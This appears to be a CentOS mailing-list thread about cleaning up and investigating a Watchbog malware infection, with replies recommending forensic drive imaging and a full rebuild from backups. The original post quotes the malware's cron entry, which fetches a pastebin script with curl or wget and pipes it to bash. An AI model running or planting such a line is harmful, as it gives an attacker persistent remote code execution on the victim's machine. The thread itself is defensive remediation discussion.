Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw areransomware.html to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp%7C%7Cwget -q -O- https://pastebin.com/raw/aGTSGJJp)%7Cbash > /dev/null 2>&1 3)ps aux | grep watchbog kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux box got infected with Watchbog Malware. Is there any open source software which can
do you have untampered log files?
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar):
- back up all user data
You should have been doing that all along.
First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups. <snip> Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).
mark